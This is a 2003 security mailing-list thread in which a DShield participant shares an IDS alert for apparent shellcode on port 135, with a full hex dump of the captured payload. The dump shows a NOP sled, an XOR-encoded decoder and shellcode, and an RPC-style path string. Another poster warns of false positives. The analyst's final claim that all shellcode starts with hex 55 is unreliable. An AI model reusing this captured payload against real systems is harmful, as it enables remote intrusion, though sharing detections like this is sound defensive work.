[Dshield] shellcode detect on port 135

DAN MORRILL dan_20407 at msn.com
Thu Aug 21 14:09:55 GMT 2003


That is one of the fun things about working with IDS systems, and the reason 
for posting to this body is to get answers to things that show up.

If it is simply padding great, no problems there. If it is something new, no 
reason to cry wolf, just wanting to share data that I personally have not 
seen before, and to get the opinion of a larger body of people.

I do apreciate your opinion, and all I have is the data that I have. I will 
share the data willingly, and I am looking for interesting view points in 
this feild.

I now know that "all" shell code starts with hex 55. I will look for that, 
and thanks for letting me know that.

Cheers/r/Dan




>From: "Mike Blomgren" <mike.blomgren at secode.com>
>Reply-To: General DShield Discussion List <list at dshield.org>
>To: <list at dshield.org>
>Subject: RE: [Dshield] shellcode detect on port 135
>Date: Thu, 21 Aug 2003 15:26:16 +0200
>
>One must be careful when crying wolf for positive triggers of Shell-Code
>detection, for this signature.
>
>In this case the signature looks for a number of NOOP's (0x90). In
>itself nothing to do with shellcode, but possibly as padding and
>commonly used in shell-code. But found many places elsewhere aswell.
>
>Just as a heads-up.
>
>~Mike
>
> > -----Original Message-----
> > From: list-bounces at dshield.org
> > [mailto:list-bounces at dshield.org] On Behalf Of DAN MORRILL
> > Sent: den 21 augusti 2003 15:00
> > To: list at dshield.org
> > Subject: [Dshield] shellcode detect on port 135
> >
> >
> > New and interesting, shell code detect on port 135 around 2003-08-21
> > 02:33:54
> >
> > I have never seen shell code on port 135 before. Here is as
> > much information
> > on this as I Have, if I see any other detects, I will forward
> > if wanted.
> >
> > Good Morning!
> > r/
> > Dan
> >
> > --------------------------------------------------------------
> > ------------------
> > Meta  ID # Time Triggered Signature
> > 5 - 6051 2003-08-21 02:33:54 [arachNIDS][snort] SHELLCODE x86 NOOP
> >
> > Sensor name interface filter
> >
> >
> > IP  source addr   dest addr   Ver Hdr Len TOS length ID flags
> > offset TTL
> > chksum
> > 65.104.244.139 	X.X.X.X 	4 5 0 806 50174 0 0 111 19765
> >
> > FQDN Source Name Dest. Name
> > w139.z065104244.aus-tx.dsl.cnc.net
> >
> > Options     none
> >
> > D-Port 135
> >
> > N seq # ack offset res window urp chksum
> > 3946 135    X  X     1569699291 2059210510 5 0 64180 0 37506
> >
> > Options     none
> >
> > Payload   length = 766
> >
> > 000 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 030 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 040 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 050 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 060 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 070 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 080 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 090 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 0a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 0b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 0c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 0d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 0e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 0f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 100 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
> > ................
> > 110 : 90 90 90 90 90 90 90 90 90 90 90 90 EB 10 5A 4A
> > ..............ZJ
> > 120 : 33 C9 66 B9 76 01 80 34 0A 99 E2 FA EB 05 E8 EB
> > 3.f.v..4........
> > 130 : FF FF FF 70 61 99 99 99 C3 21 95 69 64 E6 12 99
> > ...pa....!.id...
> > 140 : 12 E9 85 34 12 D9 91 12 41 12 EA A5 9A 6A 12 EF
> > ...4....A....j..
> > 150 : E1 9A 6A 12 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8
> > ..j....b....t...
> > 160 : 12 A6 9A 62 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A
> > ...b.k...j?.....
> > 170 : 5E 9D DC 7B 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48
> > ^..{p....T....ZH
> > 180 : 78 9A 58 AA 50 FF 12 91 12 DF 85 9A 5A 58 78 9B
> > x.X.P.......ZXx.
> > 190 : 9A 58 12 99 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3
> > .X...Z.c.n._..I.
> > 1a0 : 9A C0 71 ED 99 99 99 1A 5F 94 CB CF 66 CE 65 C3
> > ..q....._...f.e.
> > 1b0 : 12 41 F3 9A C0 71 F8 99 99 99 1A 75 DD 12 6D F3
> > .A...q.....u..m.
> > 1c0 : 89 C0 10 9D 17 7B 62 C9 C9 C9 C9 F3 98 F3 9B 66
> > .....{b........f
> > 1d0 : CE 6D 12 41 10 C7 A1 10 C7 A5 10 C7 D9 FF 5E DF
> > .m.A..........^.
> > 1e0 : B5 98 98 14 DE 89 C9 CF AA 59 C9 C9 C9 F3 98 C9
> > .........Y......
> > 1f0 : C9 14 CE A5 5E 9B FA F4 FD 99 CB C9 66 CE 71 5E
> > ....^.......f.q^
> > 200 : 9E 9B 99 9B 5A 5E DE 9D D8 F1 6D 12 F3 89 CE CA
> > ....Z^....m.....
> > 210 : 66 CE 61 CA 66 CE 65 C9 66 CE 75 AA 59 35 1C 59
> > f.a.f.e.f.u.Y5.Y
> > 220 : EC 60 C8 CB CF CA 66 4B C3 C0 32 7B 77 AA 59 5A
> > .`....fK..2{w.YZ
> > 230 : 71 9A 66 66 66 DE FC ED C9 EB F6 FA D8 FD FD EB
> > q.fff...........
> > 240 : FC EA EA 99 DA EB FC F8 ED FC C9 EB F6 FA FC EA
> > ................
> > 250 : EA D8 99 DC E1 F0 ED CD F1 EB FC F8 FD 99 D5 F6
> > ................
> > 260 : F8 FD D5 F0 FB EB F8 EB E0 D8 99 EE EA AB C6 AA
> > ................
> > 270 : AB 99 CE CA D8 CA F6 FA F2 FC ED D8 99 FA F6 F7
> > ................
> > 280 : F7 FC FA ED 99 FA F5 F6 EA FC EA F6 FA F2 FC ED
> > ................
> > 290 : 99 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00
> > ..\.C.$.\.1.2.3.
> > 2a0 : 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00
> > 4.5.6.1.1.1.1.1.
> > 2b0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00
> > 1.1.1.1.1.1.1.1.
> > 2c0 : 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10
> > 1.1...d.o.c.....
> > 2d0 : 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00
> > ...... ...0.-...
> > 2e0 : 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C
> > ...*..........(.
> > 2f0 : 0C 00 01 00 00 00 07 00 00 00 00 00 00 00         ..............
> >
> >
> >
> >
> >
> >
> >
> >
> > Sometimes MSN E-mail will indicate that the mesasge failed to
> > be delivered.
> > Please resend when you get those, it does not mean that the
> > mail box is bad,
> > merely that MSN mail is over worked at the time.
> >
> > Otherwise, hope things are going well.
> > r/
> > Dan
> >
> > _________________________________________________________________
> > Chat privately with Bon Jovi, Seal, Bow Wow, or Mary J Blige
> > using MSN
> > Messenger! http://www5.msnmessenger-download.com/imastar/default.aspx
> >
> > _______________________________________________
> > list mailing list
> > list at dshield.org
> > To change your subscription options (or unsubscribe), see:
> > http://www.dshield.org/mailman/listinfo/list
> >
>
>_______________________________________________
>list mailing list
>list at dshield.org
>To change your subscription options (or unsubscribe), see: 
>http://www.dshield.org/mailman/listinfo/list

_________________________________________________________________
<b>MSN 8:</b> Get 6 months for $9.95/month. 
http://join.msn.com/?page=dept/dialup




More information about the list mailing list